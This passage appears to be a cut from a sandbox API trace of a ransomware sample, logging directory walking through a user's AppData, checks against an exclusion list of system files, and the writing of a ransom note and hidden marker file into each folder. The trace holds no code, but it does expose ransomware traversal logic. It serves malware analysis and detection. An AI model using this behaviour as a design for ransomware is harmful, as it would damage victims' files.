ftLastWriteTime.dwLowDateTime=0xed936a3b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0060.827] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.827] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0060.827] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed936a3b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed936a3b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xed936a3b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0060.827] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0060.827] lstrcpyW (in: lpString1=0x130ebda, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0060.827] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.devicesflow_cw5n1h2txyewy\\appdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0060.830] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0060.830] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0060.830] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.830] CloseHandle (hObject=0x2a0) returned 1 [0060.830] CloseHandle (hObject=0x27c) returned 1 [0060.830] GetCurrentThreadId () returned 0xd98 [0060.831] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122128 [0060.831] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AC", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AC" [0060.831] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x113f58 | out: hHeap=0xe0000) returned 1 [0060.831] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122120 | out: hHeap=0xe0000) returned 1 [0060.831] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AC" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AC" [0060.831] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AC", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AC\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AC\\" [0060.831] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AC\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3" [0060.831] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.devicesflow_cw5n1h2txyewy\\ac\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0060.832] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0060.834] FlushFileBuffers (hFile=0x27c) returned 1 [0060.835] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0060.835] CloseHandle (hObject=0x27c) returned 1 [0060.836] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AC") returned 75 [0060.836] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.836] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AC\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xddce1aab, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd295fed9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xed95d48a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0060.836] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.836] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.836] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0060.836] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.836] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xddce1aab, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd295fed9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xed95d48a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.836] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.836] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.836] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0060.836] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.836] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.836] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed95d48a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed95d48a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xed95d48a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0060.836] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.837] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0060.837] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed95d48a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed95d48a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xed95d48a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0060.837] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0060.837] lstrcpyW (in: lpString1=0x130ebd0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0060.837] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.devicesflow_cw5n1h2txyewy\\AC\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.devicesflow_cw5n1h2txyewy\\ac\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0060.837] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0060.837] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0060.838] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.838] CloseHandle (hObject=0x2a0) returned 1 [0060.838] CloseHandle (hObject=0x27c) returned 1 [0060.838] GetCurrentThreadId () returned 0xd98 [0060.838] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1220a8 [0060.838] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy" [0060.838] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x113a58 | out: hHeap=0xe0000) returned 1 [0060.838] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1220a0 | out: hHeap=0xe0000) returned 1 [0060.838] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy" [0060.838] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\" [0060.838] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3" [0060.838] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.contactsupport_cw5n1h2txyewy\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0060.841] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0060.844] FlushFileBuffers (hFile=0x27c) returned 1 [0060.845] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0060.845] CloseHandle (hObject=0x27c) returned 1 [0060.845] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy") returned 75 [0060.845] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.845] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Windows.ContactSupport_cw5n1h2txyewy\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99201695, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x789ce851, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xed95d48a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0060.846] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.846] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.846] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0060.846] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.846] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99201695, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x789ce851, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xed95d48a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.846] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.846] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.846] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0060.846] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.846] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.846] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed95d48a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed95d48a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xed95d48a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0060.846] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.846] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0060.846] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9929a00a, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x3a6b9b29, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3a6b9b29, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AC", cAlternateFileName="")) returned 1 [0060.846] lstrcmpiW (lpString1="AC", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.846] lstrcmpiW (lpString1="AC", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.846] lstrcmpiW (lpString1="AC", lpString2="Rabbit4444.exe") returned -1 [0060.846] lstrcmpiW (lpString1="AC", lpString2=".") returned 1 [0060.846] lstrcmpiW (lpString1="AC", lpString2="..") returned 1 [0060.846] lstrcmpiW (lpString1="AC", lpString2="windows") returned -1 [0060.846] lstrcmpiW (lpString1="AC", lpString2="bootmgr") returned -1 [0060.846] lstrcmpiW (lpString1="AC", lpString2="pagefile.sys") returned -1 [0060.846] lstrcmpiW (lpString1="AC", lpString2="boot") returned -1 [0060.846] lstrcmpiW (lpString1="AC", lpString2="ids.txt") returned -1 [0060.846] lstrcmpiW (lpString1="AC", lpString2="NTUSER.DAT") returned -1 [0060.846] lstrcpyW (in: lpString1=0x130ebd0, lpString2="AC" | out: lpString1="AC") returned="AC" [0060.846] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121fe0 [0060.846] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x9e) returned 0x121710 [0060.846] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121fe8 | out: ListHead=0xf68b0, ListEntry=0x121fe8) returned 0x122368 [0060.846] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x992278f7, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd27bf9b8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x992278f7, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0060.846] lstrcmpiW (lpString1="AppData", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.847] lstrcmpiW (lpString1="AppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.847] lstrcmpiW (lpString1="AppData", lpString2="Rabbit4444.exe") returned -1 [0060.847] lstrcmpiW (lpString1="AppData", lpString2=".") returned 1 [0060.847] lstrcmpiW (lpString1="AppData", lpString2="..") returned 1 [0060.847] lstrcmpiW (lpString1="AppData", lpString2="windows") returned -1 [0060.847] lstrcmpiW (lpString1="AppData", lpString2="bootmgr") returned -1 [0060.847] lstrcmpiW (lpString1="AppData", lpString2="pagefile.sys") returned -1 [0060.847] lstrcmpiW (lpString1="AppData", lpString2="boot") returned -1 [0060.847] lstrcmpiW (lpString1="AppData", lpString2="ids.txt") returned -1 [0060.847] lstrcmpiW (lpString1="AppData", lpString2="NTUSER.DAT") returned -1 [0060.847] lstrcpyW (in: lpString1=0x130ebd0, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0060.847] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1221c0 [0060.847] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa8) returned 0x118de8 [0060.847] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1221c8 | out: ListHead=0xf68b0, ListEntry=0x1221c8) returned 0x121fe8 [0060.847] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x992278f7, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd27c03e0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x992278f7, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0060.847] lstrcmpiW (lpString1="LocalCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.847] lstrcmpiW (lpString1="LocalCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.847] lstrcmpiW (lpString1="LocalCache", lpString2="Rabbit4444.exe") returned -1 [0060.847] lstrcmpiW (lpString1="LocalCache", lpString2=".") returned 1 [0060.847] lstrcmpiW (lpString1="LocalCache", lpString2="..") returned 1 [0060.847] lstrcmpiW (lpString1="LocalCache", lpString2="windows") returned -1 [0060.847] lstrcmpiW (lpString1="LocalCache", lpString2="bootmgr") returned 1 [0060.847] lstrcmpiW (lpString1="LocalCache", lpString2="pagefile.sys") returned -1 [0060.847] lstrcmpiW (lpString1="LocalCache", lpString2="boot") returned 1 [0060.847] lstrcmpiW (lpString1="LocalCache", lpString2="ids.txt") returned 1 [0060.847] lstrcmpiW (lpString1="LocalCache", lpString2="NTUSER.DAT") returned -1 [0060.847] lstrcpyW (in: lpString1=0x130ebd0, lpString2="LocalCache" | out: lpString1="LocalCache") returned="LocalCache" [0060.847] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1220a0 [0060.847] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xae) returned 0x123a68 [0060.847] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1220a8 | out: ListHead=0xf68b0, ListEntry=0x1220a8) returned 0x1221c8 [0060.847] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99201695, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd27c0cd9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x99201695, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0060.847] lstrcmpiW (lpString1="LocalState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.847] lstrcmpiW (lpString1="LocalState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.848] lstrcmpiW (lpString1="LocalState", lpString2="Rabbit4444.exe") returned -1 [0060.848] lstrcmpiW (lpString1="LocalState", lpString2=".") returned 1 [0060.848] lstrcmpiW (lpString1="LocalState", lpString2="..") returned 1 [0060.848] lstrcmpiW (lpString1="LocalState", lpString2="windows") returned -1 [0060.848] lstrcmpiW (lpString1="LocalState", lpString2="bootmgr") returned 1 [0060.848] lstrcmpiW (lpString1="LocalState", lpString2="pagefile.sys") returned -1 [0060.848] lstrcmpiW (lpString1="LocalState", lpString2="boot") returned 1 [0060.848] lstrcmpiW (lpString1="LocalState", lpString2="ids.txt") returned 1 [0060.848] lstrcmpiW (lpString1="LocalState", lpString2="NTUSER.DAT") returned -1 [0060.848] lstrcpyW (in: lpString1=0x130ebd0, lpString2="LocalState" | out: lpString1="LocalState") returned="LocalState" [0060.848] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122120 [0060.848] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xae) returned 0x124758 [0060.848] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122128 | out: ListHead=0xf68b0, ListEntry=0x122128) returned 0x1220a8 [0060.848] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99201695, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd27c1412, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x99201695, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0060.848] lstrcmpiW (lpString1="RoamingState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.848] lstrcmpiW (lpString1="RoamingState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.848] lstrcmpiW (lpString1="RoamingState", lpString2="Rabbit4444.exe") returned 1 [0060.848] lstrcmpiW (lpString1="RoamingState", lpString2=".") returned 1 [0060.848] lstrcmpiW (lpString1="RoamingState", lpString2="..") returned 1 [0060.848] lstrcmpiW (lpString1="RoamingState", lpString2="windows") returned -1 [0060.848] lstrcmpiW (lpString1="RoamingState", lpString2="bootmgr") returned 1 [0060.848] lstrcmpiW (lpString1="RoamingState", lpString2="pagefile.sys") returned 1 [0060.848] lstrcmpiW (lpString1="RoamingState", lpString2="boot") returned 1 [0060.848] lstrcmpiW (lpString1="RoamingState", lpString2="ids.txt") returned 1 [0060.848] lstrcmpiW (lpString1="RoamingState", lpString2="NTUSER.DAT") returned 1 [0060.848] lstrcpyW (in: lpString1=0x130ebd0, lpString2="RoamingState" | out: lpString1="RoamingState") returned="RoamingState" [0060.848] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1220c0 [0060.848] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb2) returned 0x123760 [0060.848] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1220c8 | out: ListHead=0xf68b0, ListEntry=0x1220c8) returned 0x122128 [0060.848] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x992278f7, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x713b1523, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x713b1523, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings", cAlternateFileName="")) returned 1 [0060.848] lstrcmpiW (lpString1="Settings", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0060.848] lstrcmpiW (lpString1="Settings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0060.848] lstrcmpiW (lpString1="Settings", lpString2="Rabbit4444.exe") returned 1 [0060.848] lstrcmpiW (lpString1="Settings", lpString2=".") returned 1 [0060.849] lstrcmpiW (lpString1="Settings", lpString2="..") returned 1 [0060.849] lstrcmpiW (lpString1="Settings", lpString2="windows") returned -1 [0060.849] lstrcmpiW (lpString1="Settings", lpString2="bootmgr") returned 1 [0060.849] lstrcmpiW (lpString1="Settings", lpString2="pagefile.sys") returned 1 [0060.849] lstrcmpiW (lpString1="Settings", lpString2="boot") returned 1 [0060.849] lstrcmpiW (lpString1="Settings", lpString2="ids.txt") returned 1 [0060.849] lstrcmpiW (lpString1="Settings", lpString2="NTUSER.DAT") returned 1 [0060.849] lstrcpyW (in: 